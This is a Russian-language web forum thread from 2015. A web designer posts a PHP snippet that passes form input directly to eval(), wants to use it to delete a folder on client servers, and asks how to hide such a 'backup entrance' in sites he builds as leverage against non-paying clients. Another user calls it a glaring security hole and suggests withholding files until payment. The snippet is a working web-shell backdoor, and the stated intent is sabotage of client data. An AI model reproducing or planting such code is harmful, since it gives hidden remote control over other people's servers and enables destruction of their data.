06.07.2015, 22:57
|
 |
Профессор
|
|
Регистрация: 21.02.2010
Сообщений: 213
|
|
|
Выполнение кода PHP в textarea
Доброго времени суток, имеется вот такой вот код:
<?php
if ( isset($_POST['text']) )
eval ($_POST['text']);
?>
<form method='POST'>
<textarea name='text'></textarea>
<input type='submit'>
</form>
Лежит он в файлике на сервера, теперь при запуске этого файла я смогу вводить и выполнять код php!
Вопрос такой какой код мне нужно написать, что бы начиная от корня нашло папку demo и удалило ее со всем содержимым!? |
|
06.07.2015, 22:59
|
|
Профессор
|
|
Регистрация: 21.02.2010
Сообщений: 213
|
|
|
Для тех кто спросит "А зачем вам это?", такой вот ответ!
Являюсь разработчиком сайтов, было несколько проблем с клиентами.
Работаю по схеме:
1. Предосмотр сайта
2. Аванс
3. Готовый сайт
4. Оплата
|
|
07.07.2015, 03:58
|
|
Профессор
|
|
Регистрация: 14.01.2015
Сообщений: 12,990
|
|
|
Сообщение от karakym
|
|
Являюсь разработчиком сайтов
|
Разработчику сайтов задавать такие нелепые вопросы... |
|
07.07.2015, 11:50
|
|
Профессор
|
|
Регистрация: 21.02.2010
Сообщений: 213
|
|
Сообщение от laimas
|
|
Разработчику сайтов задавать такие нелепые вопросы...
|
Ну я по WEB-Дизайну (HTML,CSS,jQuery) |
|
07.07.2015, 12:16
|
|
Профессор
|
|
Регистрация: 14.01.2015
Сообщений: 12,990
|
|
|
Ну это не разработка. Нельзя выполнить код в textarea, это текстовая область, а тем более РНР-код, который выполняется только на сервере. А на сервере нет ни textarea, ни вообще какого либо html, все это строковый тип данных, включая и данные полученные формой.
А чтобы выполнить строку переданную формой как код, нужно чтобы разработчик серверной части разрешил такое действие, чего он вряд ли станет делать, ибо это "явная дыра" в безопасности - стоит не полениться заказчику и проверить такой код, и исполнитель может потерять все.
|
|
07.07.2015, 12:40
|
|
Профессор
|
|
Регистрация: 21.02.2010
Сообщений: 213
|
|
|
Сообщение от laimas
|
Ну это не разработка. Нельзя выполнить код в textarea, это текстовая область, а тем более РНР-код, который выполняется только на сервере. А на сервере нет ни textarea, ни вообще какого либо html, все это строковый тип данных, включая и данные полученные формой.
А чтобы выполнить строку переданную формой как код, нужно чтобы разработчик серверной части разрешил такое действие, чего он вряд ли станет делать, ибо это "явная дыра" в безопасности - стоит не полениться заказчику и проверить такой код, и исполнитель может потерять все.
|
Предложите вариант который обезопасит меня от кидал |
|
07.07.2015, 12:45
|
|
Профессор
|
|
Регистрация: 14.01.2015
Сообщений: 12,990
|
|
|
Без сервера вам, как дизайнеру, нет доступных способов.
Размещайте выполненный заказ, то есть шаблон дизайна, в сети, пусть заказчик оценивает, и после оплаты отдавать его заказчику.
Последний раз редактировалось laimas, 07.07.2015 в 12:48.
|
|
07.07.2015, 14:02
|
|
Профессор
|
|
Регистрация: 21.02.2010
Сообщений: 213
|
|
|
То есть, нет никакого способа, внедрить в свой код, запасной вход!?
|
|
07.07.2015, 14:13
|
|
Профессор
|
|
Регистрация: 14.01.2015
Сообщений: 12,990
|
|
|
Свой, это какой?
|
|
07.07.2015, 18:24
|
|
Профессор
|
|
Регистрация: 21.02.2010
Сообщений: 213
|
|
|
Сообщение от laimas
|
|
Свой, это какой?
|
Ну вообще в проект сайта! |
|
|
|
